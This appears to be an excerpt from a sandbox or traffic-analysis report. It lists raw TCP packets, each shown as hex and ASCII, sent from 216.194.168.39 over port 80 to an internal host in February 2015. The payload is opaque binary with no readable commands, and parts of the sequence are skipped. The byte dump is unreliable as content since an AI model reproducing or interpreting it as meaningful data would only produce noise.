Feb 19, 2015 13:01:58.937352896 MEZ801032216.194.168.39192.168.1.10Data Raw: fd e6 d9 bf e8 a0 3e 0d 88 ae 93 93 1c f9 24 63 59 f8 1c 18 58 9d 89 d0 1a fc cc 13 fc e7 7a b1 6c 9c b3 2d ca 76 61 6d 80 ca f9 df 1a ab 4c 59 23 38 98 61 6c ac a3 4e 28 71 31 62 5e 36 3e 7a 41 2d a9 22 c0 88 7f 7d 7f 23 91 71 b0 ca da 52 40 93
Data Ascii: >$cYXzl-vamLY#8alN(q1b^6>zA-"}#qR@>Dkv{tH\.+3B>OvlJH,3[8'qTw|Ey]>5t* ^!: %[>eoD:Qs>"]o<
95
Feb 19, 2015 13:01:58.943394899 MEZ801032216.194.168.39192.168.1.10Data Raw: 99 70 51 5c 72 a9 97 ab 1b 70 c2 33 85 fa 1b 38 a3 ac 59 1e ae 9a b5 bb 75 5d 3e 2f 82 13 cc 3a 5a c7 b2 61 b1 4d 8d ed e1 d6 8b 92 1b 76 6e 39 52 2a 23 28 4a 6c 49 2f ef 83 04 1c c4 a8 e7 6c 1b aa cf ee ae 9c b7 bb 46 ac 66 f6 e6 3a e8 2f 56 83
Data Ascii: pQ\rp38Yu]>/:ZaMvn9R*#(JlI/lFf:/V><8joh%ysj&>#/98b>_o}?J}?{Zns@gSt>aaEnCz5Fa@>BahDPg?Z>Z
95
Feb 19, 2015 13:01:58.967006922 MEZ801032216.194.168.39192.168.1.10Data Raw: 7c ed 00 cc 80 9e 82 55 45 61 0a 02 f5 ac 1c a1 fd f5 45 4b 48 23 3e a9 35 58 9d 27 2a 06 10 d4 5f bc 83 00 84 3f 45 34 1b c9 78 8c 8b 8e 7b 90 05 ac fc ea 02 47 7f 43 0f 63 3e c6 26 d9 7e b3 ad a1 2c cd b0 90 4a 9d 00 80 13 9a 37 ac a3 79 15 95
Data Ascii: |UEaEKH#>5X'*_?E4x{GCc>&~,J7y>lXK"rCuxkEXl(QjNIRbe>X.2e;#[.$&IX>'Cz<HSdTG/W_XGpX>R)lG7-%qW>
97
Feb 19, 2015 13:01:58.967029095 MEZ801032216.194.168.39192.168.1.10Data Raw: c9 ed ec 62 1d 85 ae 0d 34 dd 73 1c 76 ac c0 a7 df dd 82 29 19 8b 3d 50 18 c5 3b d3 da 1a 6a 0d cd ac 69 11 6e 3a e0 42 15 ed 3e 25 1b 00 2e 3a 38 c0 75 46 f7 1e 4f 68 d8 92 53 9b 1d bc a9 72 15 5e 31 a1 3f ac c7 ae 6e 31 7d 89 4d 90 fe 78 16 04
Data Ascii: b4sv)=P;jin:B>%.:8uFOhSr^1?n1}Mx\];V=)5xa4>8faT.F}WGFJ>H!qmk'Zt>S`b5K]BD+K->|O%jk9pRJGl|JD]3.>w`NrQ#8u
98
Feb 19, 2015 13:01:58.967279911 MEZ801032216.194.168.39192.168.1.10Data Raw: cb f8 7b 15 9c ac a7 f9 56 f3 f6 f4 79 96 3e 04 3e 81 eb 27 24 7f 88 ac 25 e1 05 c9 b6 64 69 0d 1e 69 ea 58 cb 60 5e 62 f1 ae bd 2a 3d 1a 55 c8 b4 ba 53 b3 04 ac a2 9b cb 92 bf d6 1e cd ef af 4e 97 00 2c bd ac 87 f1 a8 31 70 08 f5 06 3e 50 d2 f7
Data Ascii: {Vy>>'$%diiX`^b*=USN,1p>Po;RIAJ"N2W<=?_bC0u}>CBSpNYL7<Y^}>LC%JQ6>n~r]?0Y70=V])a#>?>h
99
Feb 19, 2015 13:01:59.030251026 MEZ801032216.194.168.39192.168.1.10Data Raw: 9a b9 9b e0 6c 0f 3e 3c ee 50 f1 0a 5e 56 3b b3 1b b4 da 08 c4 a7 a7 ed b9 ac 4a f3 5c 2f 2a 72 16 d1 3e fb 37 cc d5 05 0b fe d6 aa 79 5d 7c d0 f6 17 79 6a 1f a1 96 28 58 ef b6 b2 dc ac c3 68 f2 fc 2d 8c d3 82 3e e2 21 c5 cb a7 4a 0e 99 b3 7c 48
Data Ascii: l><P^V;J\/*r>7y]|yj(Xh->!J|Hf4K[V!zY75|o>><myg_6:&e>+HW<@g+A=bhdz|.9G>[]w<*K1qf >cg0J1 w|q>.DJI
100
Feb 19, 2015 13:01:59.031028986 MEZ801032216.194.168.39192.168.1.10Data Raw: 42 60 3e 85 67 20 a8 d2 7f 63 d0 16 34 40 34 9e ee 2e ae 45 40 8f dd db 40 6b a1 19 ea 24 df 1b 46 17 20 91 34 91 e7 48 20 77 4e 3d c9 e5 d8 b6 aa ac 70 35 3b 6a 6e 8e 2b ff 3e 82 28 95 11 b8 c6 ca 55 a4 35 d1 d6 38 a5 a4 44 49 24 ad c4 68 5f 35
Data Ascii: B`>g c4@4.E@@k$F 4H wN=p5;jn+>(U58DI$h_5J)A7&( *l$cl1>`^Z"Jr,vk0>8$79^~ lWAQ>PGpZiXr$%:'x>Bl9ESlR; arJrzM>>tEN)l5P
101
Feb 19, 2015 13:01:59.031045914 MEZ801032216.194.168.39192.168.1.10Data Raw: 60 88 3f c0 20 ed 1a f6 61 88 1a 82 05 ad 4a 84 0d d8 3e e5 05 ed 4a a2 60 88 7f 87 60 ed 6b ec dd c6 00 07 21 a4 2b 13 b6 9a 54 4f 36 ac d6 e1 ea 91 7f 7f bd ee 3e 7c 6f 7d d3 06 e4 26 43 90 c5 a9 f0 5e 36 6b cc 1d 21 62 92 a6 e6 1e 67 b8 59 2c
Data Ascii: `? aJ>J``k!+TO6>|o}&C^6k!bgY,lj|!|*gMrdW>w46s$EZ=C+`>.MF|1)!JF1X<sff>S-PK#_%:D>zYL(Pe!)u.?
103
Feb 19, 2015 13:01:59.031210899 MEZ801032216.194.168.39192.168.1.10Data Raw: 02 ed 53 92 22 be 27 b0 a7 c8 65 04 61 ac 8e ad 88 6b 1f b1 e6 4c 3f 28 2b b6 98 ab c2 ce 37 01 22 af a9 03 58 ff 5a 64 c3 ac a0 91 a3 e8 82 d5 67 cb 3e 9d 59 51 d5 ba 02 e4 95 fc a4 ef eb 82 91 ac 93 99 21 e3 3a b6 26 fd a7 a1 3d ff b2 01 c5 18
Data Ascii: S"'eakL?(+7"XZdg>YQ!:&='#fYFO6;`,&$D=iDECn>VcYYF=o =>.(D,lCuW#YZ[t`u>ob&|Dj{Xc>Y@X5NY"*=w#IfBDlYdeAv,$*#
103
Feb 19, 2015 13:01:59.037748098 MEZ801032216.194.168.39192.168.1.10Data Raw: 00 42 72 ac 80 13 a0 e2 d4 3b 9e 29 3e 4c 09 94 fe f0 71 7d 80 0f 16 c0 58 3e 7b c3 3d 18 20 19 3e 5d 32 0d 35 65 9e 5e 57 74 72 09 e8 da 76 ee 0d 0e 23 55 44 e7 55 f4 7f b5 c8 ac fe 95 be a6 56 7a f6 c9 5e 24 5a bb 4f 18 1c a8 07 79 2e ac 0b 7a
Data Ascii: Br;)>Lq}X>{= >]25e^Wtrv#UDUVz^$ZOy.zK{>2oqvp#Bem#oPgm9g>\@Awpy?bQx?I&#Ue90>FZs_YBx>0X(^37=5#=2!T>h^A
105
Feb 19, 2015 13:01:59.037767887 MEZ801032216.194.168.39192.168.1.10Data Raw: 4c 86 3d d1 7e a5 24 51 53 98 b4 97 fd 9a 44 ac 85 bb 43 dd 7f 26 13 10 3e 8f 05 e1 19 96 d8 33 23 d7 c8 ef a9 7b 2b b7 7d e7 94 ac bf 0c f9 6a 69 b2 39 cc 3e 79 03 1c 12 2a 24 b9 be e6 da 58 51 9e c5 92 f8 a1 24 d3 e0 43 38 b4 95 7d d8 8c 5e f4
Data Ascii: L=~$QSDC&>3#{+}ji9>y*$XQ$C8}^F)w5U$C!ZW>^2d$F2/r}%L>^!N.i-$W2Er64>3ZqeEQo_P>ClRw%Rg
106
Feb 19, 2015 13:01:59.037770987 MEZ801032216.194.168.39192.168.1.10Data Raw: 97 d5 85 63 d6 83 61 89 3e 05 34 1a d7 80 3b 3b 08 48 75 96 18 76 87 d4 5f f7 26 e2 4b 20 46 6b 20 4f 22 aa 6f 22 20 c5 38 a4 47 5c 2a 9f 26 0b 2a 90 f1 6c 28 96 92 ac 81 33 75 18 74 d2 fa cd 5e 10 ef d1 16 89 59 af 47 55 f3 ac f9 e5 19 9e f3 24
Data Ascii: ca>4;;Huv_&K Fk O"o" 8G\*&*l(3ut^YGU$>Mn'k[)N]&Mrin(ec:4=Lie\>`xbisJ~&qkSE<e>;L`qw>"k8]wp*&LWq`\72'
107
Feb 19, 2015 13:01:59.038433075 MEZ801032216.194.168.39192.168.1.10Data Raw: e3 af 3e 0d 66 52 2a 98 fd 42 04 d4 87 d6 e1 fa c0 58 6c d1 26 69 e3 6c 36 44 e8 98 15 ac 3f c1 aa 20 c7 2e a4 2a 26 e8 60 a8 d1 d9 0c c9 c2 cf 5a ac 5b 43 64 89 df 47 41 6a 3e a4 67 1f 2c 57 b4 9d 69 e2 7a 7f 23 9e 64 eb 59 04 26 d5 86 e2 57 ce
Data Ascii: >fR*BXl&il6D? .*&`Z[CdGAj>g,Wiz#dY&W=H~#A'>cC_FD8YnF[yk&`Z\y>s9G;0Dh.%:"`$:J(a'xEQ>k^7ODXG5>phBau5\
109
Feb 19, 2015 13:01:59.038450003 MEZ801032216.194.168.39192.168.1.10Data Raw: f0 fc 3e 97 c9 cb 1f 83 ca 9f a5 41 dc 8b 2f 01 c9 2b 4c 0e 28 c5 96 90 29 8d 7e d5 24 ac ca 96 4b 0a 3e ef 3b e6 3e 99 79 96 93 9a 29 2e 03 4a 4f a3 6f 30 85 d7 b4 24 08 80 a3 28 a1 09 65 45 91 fb 3e 0a 4f 1c b6 a4 8f ed 4c 51 51 ef 9e 0a 81 73
Data Ascii: >A/+L()~$K>;>y).JOo0$(eE>OLQQsl(Y"&f!49'>^[ZsvVH~(y%,T.<43UZ3(p2y6y~>n&j;p(VfM>sP~urpK.$">qpzzn
110
Feb 19, 2015 13:01:59.038651943 MEZ801032216.194.168.39192.168.1.10Data Raw: 2d 25 3a 37 32 c9 a4 11 10 ac 7b 43 b1 a2 c1 80 d8 c2 3e e0 43 8b 6f 6b d0 35 20 b2 28 76 2c f4 87 bc 09 d8 29 c3 3f fb fa 88 d9 0e cf ac 78 0f e6 de 25 c7 68 ec 3e b1 d4 34 96 31 72 1d 5e bd 8e e3 3b f5 2c 16 42 ab 05 e0 3e fa 34 8e 27 7b 17 8f
Data Ascii: -%:72{C>Cok5 (v,)?x%h>41r^;,B>4'{Cce)6Bs(R-:N4h>-#_R-s)3KlP<m>4;-mA;,v>FID)Mf..sm=*E=Y}sq^>
111
Feb 19, 2015 13:01:59.042596102 MEZ801032216.194.168.39192.168.1.10Data Raw: bb 51 18 5e 2a fb b5 7e 68 f9 5e f7 8a ad 25 90 92 a2 27 51 1b ab 8b bb ce 3a 46 4a 71 2d 30 0b 2a 08 d0 6a 11 c1 9b db 0c ac ab 92 1f af 44 d2 49 e3 3c 77 b1 b2 bd 54 b1 8c e2 54 2a 61 6f 59 1d dc 1d 8b 01 ac b0 83 6b 6a 15 9e 41 f9 3e c3 6e f5
Data Ascii: Q^*~h^%'Q:FJq-0*jDI<wTT*aoYkjA>nPX/'x*iq^|>n"c<g+,WM bn>2=G_!Ip*z}Dl"x@>znQ<q%v(`;1 :>@Hx~;D6 %J">-q
112
Feb 19, 2015 13:01:59.067202091 MEZ801032216.194.168.39192.168.1.10Data Raw: 59 00 2b 56 da 81 c4 3d 62 b5 6f ac 88 a2 7e ee 0e 47 1f 15 be df cd 29 cc e3 d2 8b e5 2b 2b ef 9c 32 fd f4 25 3a 45 ac 75 24 86 50 ec 41 43 4d 3e 7f e9 e1 5e d6 39 b6 19 40 65 7c 42 dc 73 d0 e5 de 2b 91 f4 a0 6a cc 4b 03 1c ac d4 55 06 9a a6 6a
Data Ascii: Y+V=bo~G)++2%:Eu$PACM>^9@e|Bs+jKUj_6x%B@@r+~WwT%xBcR/>`m"P>M7+pD+?,|J64WW5+k2zlK>CR`/I+<KG$'$R4-ogHF#fn++Fk&9Fh-:p>
113
Feb 19, 2015 13:01:59.067224979 MEZ801032216.194.168.39192.168.1.10Data Raw: 28 fc 8e dc 7d a0 f0 b1 a4 ec 72 c9 74 6a 2c 0d d8 7e e3 4c af 50 31 ac 98 30 fc 1c df 55 6c d1 3e 7b 3e 49 45 47 6e dd 20 aa 63 aa 77 ac 3b 25 7d 36 9c 9d 3e c7 12 9a 66 3b 60 a2 4e ae ac 43 b7 61 e5 8a 0a a0 2c 5e e6 14 0d 0e 0c 8f 7f ac 7a 5d
Data Ascii: (}rtj,~LP10Ul>{>IEGn cw;%}6>f;`NCa,^z]>KIa8y"$)5;&~hH:,OZLIE<>d+]EU.n{A,l?],bs[a# >z9ok,gk{ES{>r
115
Feb 19, 2015 13:01:59.067426920 MEZ801032216.194.168.39192.168.1.10Data Raw: d6 bb e6 65 3e 72 93 ce a4 03 22 50 da 0f cd 91 8e 2e 7a ee 21 2c 2e 57 8c 55 a2 8d 85 45 2d ac 24 62 4c d2 47 54 df ed 3e e9 56 7c 72 e9 c1 ff 33 10 97 ba 11 45 15 e4 30 21 6d ac e1 23 1b b9 ec 7f 18 48 3e eb 85 91 37 0c 64 ed 14 1f 2d 4c fd 81
Data Ascii: e>r"P.z!,.WUE-$bLGT>V|r3E0!m#H>7d-LGu..<oP~0>#o[o(&r=E.30;8,$r,0$/G{.E&iQk-7/>v):8!$.YGfe.Q4yu?`j.&-"k1'x*<>u'*
116
Feb 19, 2015 13:01:59.137345076 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e d9 12 3a 4f e0 e0 cd 03 d4 24 48 8a 29 41 e5 72 cf 2e 93 33 06 ca 49 e1 b8 6e ac a3 73 72 8f 64 c6 6b e1 be ce c2 0f 9c a2 0c 75 65 d4 2e b0 d3 77 46 cf 2a b6 db ac 91 1b b9 9a 71 f1 59 6b 3e 4a ab 90 bd e1 ba a2 76 ec e6 fc 91 39 65 8e 44 f5
Data Ascii: >:O$H)Ar.3Insrdkue.wF*qYk>Jv9eDm>fw>~W(*im.xPl.cTP?!>&siR}aS.DD_~CjoFw*;xED>E?rLB2v#},5=^KN`"/
116
Feb 19, 2015 13:01:59.140702963 MEZ801032216.194.168.39192.168.1.10Data Raw: bd e7 56 ec 7d 43 3e 03 73 24 25 d8 9a 74 6c 52 ff 7f 7d fe 6e 63 14 c5 2f 9b 15 39 74 04 c4 56 a2 ac aa d3 86 03 57 c2 f3 05 fe c7 78 60 9b 1b 3c 93 38 e1 22 ac 7c 25 ec 68 bf e0 07 26 3e e8 eb e9 a8 82 44 88 7e 60 c6 4a a9 4f dd e5 fc 23 2f 38
Data Ascii: V}C>s$%tlR}nc/9tVWx`<8"|%h&>D~`JO#/8+VAoE>_WZqr6/u*;YA>+n2*e?9/>^~+>a z1wO,;$_p|h27;T/sIVSh>J{z=P_i/@2"
118
Feb 19, 2015 13:01:59.140717030 MEZ801032216.194.168.39192.168.1.10Data Raw: d9 94 2f bf 31 ac b2 e9 e9 20 7a 6b ce 98 3c 2e b0 a2 6d 91 bc e0 ef 91 30 45 d3 5b cf 52 bc 06 21 88 57 25 b0 b9 57 18 30 ae d7 03 11 2e 36 ce f6 e8 c3 49 1a 0c 27 c8 b0 a5 b4 fb bb ab 03 e8 44 ac 29 47 74 61 79 46 37 29 36 0f 45 a9 be c9 c4 2d
Data Ascii: /1 zk<.m0E[R!W%W0.6I'D)GtayF7)6E-02G9-14W4m=DtaR*0>d;,:5to[U8R*o4p7Fltm1&?`tM>DAo'fTE-=0[P1aj&a82?E=IE>
119
Feb 19, 2015 13:01:59.140959024 MEZ801032216.194.168.39192.168.1.10Data Raw: 60 b3 94 5c 24 ac 20 7f 7b be 5f 0b 10 40 3f 49 46 ef a9 01 76 5e 3d 1c 22 76 85 95 2e f9 04 72 70 60 3e 1c de 4a c1 5d f3 b3 8e 3b 7f f7 ce f1 08 e1 77 93 0f a4 88 8a d4 f9 04 b1 54 53 50 30 a6 e5 04 cf 0b 62 ba 69 a6 ac b7 c9 64 c8 88 56 72 91
Data Ascii: `\$ {_@?IFv^="v.rp`>J];wTSP0bidVr6,&[92 :j{.hx^Wgp#(>x:F7mm~hqPKKB{>d"|\8":ifrg&H*Z|+87).g+2l\g,gj$rut0j
120
Feb 19, 2015 13:01:59.142179966 MEZ801032216.194.168.39192.168.1.10Data Raw: 6c fc a0 8e a9 19 05 1e c4 8c a6 df c3 d1 e6 65 09 5e 89 a1 df 04 07 e9 e6 05 48 e0 30 9e f8 9f cf e6 23 2d 98 96 bc e3 74 97 e0 93 39 ec 01 5e 08 ac 25 b3 0f b5 7a 5b 17 b8 36 1b 7a 4e eb 96 7b 74 99 52 32 e4 23 a7 72 27 ed 5c a2 ad cb 8a e7 34
Data Ascii: le^H0#-t9^%z[6zN{tR2#r'\4mHb$cJQR_6-p" .;w:^r>#ULgff/T sA{4"0^A.z).*G{cz'>BqjUk6BpAks
121
Feb 19, 2015 13:01:59.142195940 MEZ801032216.194.168.39192.168.1.10Data Raw: b4 b8 bf 97 75 2d 23 a8 1f a4 03 c8 6c af 09 4c 77 ab 7e 36 4c f7 6b 8f 23 ac 1f 90 35 58 72 11 68 72 6e fd 6c 87 1c 7c 2c c5 f3 c9 34 75 3e 1f 74 ef 7e 96 45 8f 73 11 d6 40 5b 18 7a ae 3f 19 df ed 7f 16 9d d3 32 1b d9 1f 62 97 3b 06 09 d7 3c ad
Data Ascii: u-#lLw~6Lk#5Xrhrnl|,4u>t~Es@[z?2b;<5}V!\M >%5lb5fhs@"l=gw$ak"5.CZX*>l4U\ktp4)~5[Y5,;74Ln>;z=fr836mLr;">>5end^67>
123
Feb 19, 2015 13:01:59.142199039 MEZ801032216.194.168.39192.168.1.10Data Raw: 70 bc de 8c 22 f8 ee 9a 37 fb 48 42 88 01 73 e2 dd fb 36 9b 6e cd 98 47 4a bb 57 16 15 bc 38 7a 76 0d 88 44 29 91 3e 35 27 b5 d3 38 af 15 d6 83 40 97 e6 7a 7e 3b 2a f7 2b aa 3a e5 57 ef 05 c2 91 ca f4 47 b5 1e cc 7f e9 c7 d6 ca a5 90 3f de 0e 3a
Data Ascii: p"7HBs6nGJW8zvD)>5'8@z~;*+:WG?:}74;S<%#k#[S>UY4rDI^t~(zMk=vPBY;sQaH6~=mwQ:\QC1z}9>2\:xoC0|}:V[<
123
Feb 19, 2015 13:01:59.144345999 MEZ801032216.194.168.39192.168.1.10Data Raw: 5a d7 70 67 f4 17 87 a8 90 cd 00 97 36 45 c2 b3 da e7 e1 d5 01 11 63 97 8f d9 b2 a4 1e 2b de a9 05 80 7c ed 66 fc 70 4c 0d b5 d1 e4 7f be 37 ec 99 8a 77 34 7e c0 f8 ad 3c 2c 90 96 bc fa 63 e6 33 4e 3a d7 ef 95 b3 de 04 4b 32 24 2a 06 78 2b 6a 7e
Data Ascii: Zpg6Ec+|fpL7w4~<,c3N:K2$*x+j~z4[3@0.t.IcG>sZY:;(6cu,NV*d{5",fqiSB^4%j1:#]=f6,5dv[ftJnurh4r6yg;@}h-`~Pvc4
125
Feb 19, 2015 13:01:59.144361973 MEZ801032216.194.168.39192.168.1.10Data Raw: 7f 61 77 ac 7d 21 db ef 7f de 04 41 48 22 77 ed 7d 24 81 ad 7f 84 4c e6 54 d9 77 33 7f 27 76 ad 7f 2b 76 ed d9 a6 0d 3c 23 3f 77 98 7b 26 ea 5e 2f 19 4a ed 7f 6c 36 ef 3f 2e 36 05 e6 7e a0 51 2f 66 47 7c b1 5a 8f ed e6 72 76 ad 3f 30 36 ed 7e 35
Data Ascii: aw}!AH"w}$LTw3'v+v<#?w{&^/Jl6?.6~Q/fG|Zrv?06~5bn Qa;6}8ww}=v|w+*W~v:Wvt~v}vhvTv~}x+kX\`>6b~vtWsd}7#vqrt6wm#-v~t
126
Feb 19, 2015 13:01:59.144542933 MEZ801032216.194.168.39192.168.1.10Data Raw: a1 e7 9b e2 4e b1 7e b4 9a e4 9c 4d af 98 77 36 6b 2c 29 9d 7d d7 9e 4a 00 52 8b ca f1 2f d0 4e 76 99 e5 ef 7a 72 7e 8a a9 82 aa 57 dd d1 27 4c 7b fc 86 65 6f b5 5c 93 34 9e 76 c1 0d b2 7a b3 16 98 df 25 7f 44 24 fb 42 9f ac cf 7f 93 6e fb be 1d
Data Ascii: N~Mw6k,)}JR/Nvzr~W'L{eo\4vz%D$Bn'u~eh~$}(t2^`v~~~}D$i{{/.+d}~HtP~#Wcg{+rB~Lw4y5mDEw|tzO~3~v[3{Yzr1I{Ns&AS
127
Feb 19, 2015 13:01:59.151237965 MEZ801032216.194.168.39192.168.1.10Data Raw: fd e5 1e 8e 98 65 6a 95 12 b2 1c 84 7b 4a 55 20 ee 38 5f 5c e3 51 26 85 f8 65 12 ee 59 6c 7a d3 1b cc 1e 7e 81 55 3b 99 1b d5 0d b1 11 fc a1 84 53 6d 18 bf 25 b0 a9 e7 13 f4 10 03 e8 4d 3a ef dc cb 0d bc 53 0b 59 e5 97 9d 0f 2b 6b 6d 5b 8c 2e cf
Data Ascii: ej{JU 8_\Q&eYlz~U;Sm%M:SY+km[._|:]GRy?[3s'y +wb^}$dG!6@3x7+L~)Rx]#^iew(Av%Yo2*HRq~:{utAhK:`!b[qN}X)l
129
Feb 19, 2015 13:01:59.151258945 MEZ801032216.194.168.39192.168.1.10Data Raw: 3b 6c 2a f8 02 1e 31 9e de ac bd ac 5a 87 36 06 6b 59 3e 51 dd df fc b0 57 8b 30 31 e1 39 1e 89 38 67 a3 e4 3b 92 8d 6a b7 f2 20 02 54 ac 04 96 66 8c 0e 5b f1 4d 3e 9b b3 66 b6 7c be 09 63 3a 5b bb f5 31 46 79 7e d4 3b 97 64 7f 67 9d 34 97 9b ac
Data Ascii: ;l*1Z6kY>QW0198g;j Tf[M>f|c:[1Fy~;dg4Ds>a,arCqMW;[NPGms0>3tL-yaF;H]l>9jEUU;nAR0`0f0WB@>fA^z6;gOra_W>`z7aDX
130
Feb 19, 2015 13:01:59.151262045 MEZ801032216.194.168.39192.168.1.10Data Raw: e3 8d d2 d8 58 13 3e 00 7f 83 11 e2 35 ed 97 9b 1e 79 0a 77 69 e5 10 1a 3c 0f 51 46 9c 39 77 d2 17 ac 6d 19 59 e2 42 28 be 6b 32 85 1a b3 3b ba 39 aa ab e9 ce ac 48 c9 2c 97 bf 52 c3 c6 3e 15 e1 b9 d7 fd 15 c4 21 a9 fa 15 3a 6a 4b fa ba eb 3c 92
Data Ascii: X>5ywi<QF9wmYB(k2;9H,R>!:jK<FU!*j>.j}Ecgl>6cQRn5<A^PgmmG:8kjk>w6T,%R7<9iDf">D=b<Vy8!
131
Data Ascii: 3TvVo>$\ip%h)K/r6f>nu@7@*/`e6>u;Lhr>-<^(3RQ5k}G"[#\5tsipPr>z$@ X!$gjv*hx.)w@H/>Km$V}4;
238
Feb 19, 2015 13:01:59.968636036 MEZ801032216.194.168.39192.168.1.10Data Raw: e1 67 a0 5b 85 ce fb cd a0 a6 e5 7e bc ed ca 54 d8 ac 7b a8 e9 14 32 8a 51 e7 0e 59 0f ae e1 52 a5 95 3b 33 f2 ac 8b 9d 15 7b 86 c3 ad 84 3e f5 11 0d b5 28 e8 30 a0 73 0c 28 47 3b ed 6c 01 ef a0 3e 45 61 0f b2 42 37 8f ac c4 a3 65 ff 54 81 2f c9
Data Ascii: g[~T{2QYR;3{>(0s(G;l>EaB7eT/>Od@|y<! h2wO?hpR<gY4%Y>t;_|o]1>Yl[02U0ln>6NMSaA ,Fsc4
238
Feb 19, 2015 13:01:59.968691111 MEZ801032216.194.168.39192.168.1.10Data Raw: ad e5 5b f1 aa 2d 61 da a0 f5 3e 8e d3 cf 4c 79 c3 ac 7f 80 20 fa 35 42 83 92 3e e0 87 7c 25 a0 91 8c 13 e8 78 13 3b 56 a5 16 de 05 c8 45 3e a3 ed ed cc 46 09 60 41 f3 03 a9 02 b4 d2 34 9c 3d 20 a6 44 33 9e c4 43 e3 3f af 3f 61 a3 26 80 3e 9d c1
Data Ascii: [-a>Ly 5B>|%x;VE>F`A4= D3C??a&>GYw|]u'B>:+YC]M:zc)>$_j8D$FfI2^ndr>vk7'IM^:OD!6+.@"
240
Feb 19, 2015 13:01:59.968696117 MEZ801032216.194.168.39192.168.1.10Data Raw: e1 2e e9 44 01 ab 3e 73 01 c0 fc 4e 82 b4 1d 56 8b 07 5d 29 f4 a8 d8 7a 82 8a 8a 1a e5 a6 e5 51 05 26 3e ec 82 fc 51 d3 7b e4 e2 5d 98 31 3f f7 2f f8 5e 33 a2 54 76 21 c5 20 6d da 74 ac a8 48 be 2b ae f4 e1 51 3e cb f7 29 0a 83 57 ac d2 66 de c8
Data Ascii: .D>sNV])zQ&>Q{]1?/^3Tv! mtH+Q>)Wfr/*hLS7)s5<f;mu(D]BwK>Q&~v/7Fnjt7"$>:}#8]t+0gsF[X>`_D%5
241
Feb 19, 2015 13:01:59.968759060 MEZ801032216.194.168.39192.168.1.10Data Raw: bb ac 64 81 43 69 63 62 dd 9e 26 5b 9f 1a b1 c7 2a a8 3a bd e1 ac eb 47 56 ec 0d 48 9a e8 3e 63 42 a6 33 aa 1d 63 55 c9 cb 51 62 ba e8 1d 6b 3d a3 ee e1 d6 ae 85 64 f0 33 ac 1f 66 96 b0 6b 0e 31 5c 0e 2c be 3f 06 1e a7 65 3a df 0a ac 80 59 d2 27
Data Ascii: dCicb&[*:GVH>cB3cUQbk=d3fk1\,?e:Y'>rEw^lvGC<@lUs>$PyqQ#Po9jVH?}F>EnlH>I0[kZxq~TaI;OR-lt>wN~Huuuc(i
243
Feb 19, 2015 13:01:59.968775988 MEZ801032216.194.168.39192.168.1.10Data Raw: b5 a8 7f a1 c9 f7 37 73 aa b4 3e e3 03 7a 5a 39 69 e0 00 31 bd 56 c9 e2 f5 95 2f bb 25 f9 c6 72 e4 eb bf a2 5e aa 3e 76 bc 43 04 2b 58 c8 15 38 e0 74 3c 78 6e 01 bf ad a5 a9 ed e2 82 e9 25 87 dc ac 0c e6 08 a0 32 29 c1 d7 1e a8 0d ff c1 a1 fe a4
Data Ascii: 7s>zZ9i1V/%r^>vC+X8t<xn%2)Xvb@/I>{$Jp##NjW\Y,>FO!m%!<tN~VVmJVpaR}z_>F.9c_\C;`x53j<m{&A>iU<`1p
244
Feb 19, 2015 13:01:59.968813896 MEZ801032216.194.168.39192.168.1.10Data Raw: 06 ac 32 6a 75 01 cc 2f 5a 04 3e 88 60 58 9a 7e fc 20 3f 9e e7 ea f6 e9 d5 48 ec 5a a6 a0 7d 36 d4 cf 40 84 a8 ac ee 6c 6b b1 bc 33 57 5f 26 e4 cb e2 e1 a3 0c 13 87 3c ca ac da 74 42 b9 b3 c9 a8 a7 3e 65 b1 cc c8 d4 4c 48 3e 6c 7d 71 4b f0 0a 64
Data Ascii: 2ju/Z>`X~ ?HZ}6@lk3W_&<tB>eLH>l}qKdA>Hcq||&R\6;>1n6o[M 4p4U=!4&V"1n$M3>:A_vF+^ ,S/#:/};a0QK>4kr
246
Feb 19, 2015 13:01:59.969012976 MEZ801032216.194.168.39192.168.1.10Data Raw: 0d ef f3 4f a9 77 32 d6 40 17 09 3d 55 d5 3e c2 ae d5 2e 6f 2f d7 2e 0c b5 b8 fa 46 09 39 db 6d a8 da e6 93 1d cd 90 51 66 ac cf 81 ec dd 12 01 b7 d1 3e 42 fd af 45 97 9f 46 5d 15 e9 25 35 0a 53 48 78 77 a8 ea ce 59 9c d2 7a 15 35 2c 73 36 48 25
Data Ascii: Ow2@=U>.o/.F9mQf>BEF]%5SHxwYz5,s6H%22Izt[\_^~I>U>>%&%s(;?i4g>8TJ&%4cQD7> lf5%k{~F>^u>2)~x"
247
Feb 19, 2015 13:01:59.980128050 MEZ801032216.194.168.39192.168.1.10Data Raw: 12 36 a9 09 9e 78 b8 c9 7f 49 be ac f6 7b a8 9f ed 4a 51 ae 3e 48 78 ed 00 f0 bb 8b 31 58 ff 95 92 f3 ed 81 c3 5e a9 ac f1 fa a6 2d d2 dc 0c ac 48 a3 1a 5a 2c 3e af f2 3e 78 81 e9 8d bc d6 cf 15 61 26 5b 19 e4 ca a1 6e eb 69 ed c8 56 91 aa 5c ea
Data Ascii: 6xI{JQ>Hx1X^-HZ,>>xa&[niV\Ff)V1",i+Il->Wc5gno;rfS=lk'jq>{$^}=$N#z6~n4<v>f~if5QH3:
249
Feb 19, 2015 13:01:59.980143070 MEZ801032216.194.168.39192.168.1.10Data Raw: 73 6f 0e 5c d7 8a 47 72 3e cc c6 d2 24 f8 0b b3 8d 82 ef ee b1 2c c8 62 65 d0 95 ac ac 2c 9b 6c 98 e8 ee 0e 3e 85 30 c5 40 dd 3a df 8c c9 1d fe dc 95 2d c5 9a c0 aa c1 76 f1 4d f4 f1 60 2a ac c1 f5 fd b4 ce a3 46 be 3e b8 ad f5 c6 25 0b 38 26 92
Data Ascii: so\Gr>$,be,l>0@:-vM`*F>%8&"9f%z8> :#'GsC28S^U>,z*h6:z3Q1j&U3yd8{iUP<:U0T.&sQ*>9Yc
250
Feb 19, 2015 13:01:59.980149984 MEZ801032216.194.168.39192.168.1.10Data Raw: a3 30 93 ad ac 2c 26 96 e4 fa 94 93 ca ae ac 1d 6d ee 77 54 af 55 6c ac fb 71 ff 5a 17 90 a2 36 3e 4d 9a 31 67 e0 36 3e f9 35 ec 0b c8 e0 d3 e9 a9 eb a0 b6 7e 47 c7 26 3b 25 cd a0 e0 3a 90 16 ca e1 32 f7 53 af ac 25 67 01 9e 98 1e 99 2d ac 27 1d
Data Ascii: 0,&mwTUlqZ6>M1g6>5~G&;%:2S%g-'G~Q>5-5C"7.7g1J8t8A5>}%JkHAQ273P^GVhVo~f"R?M8A->2p_j|=xmY.G&H1b
252
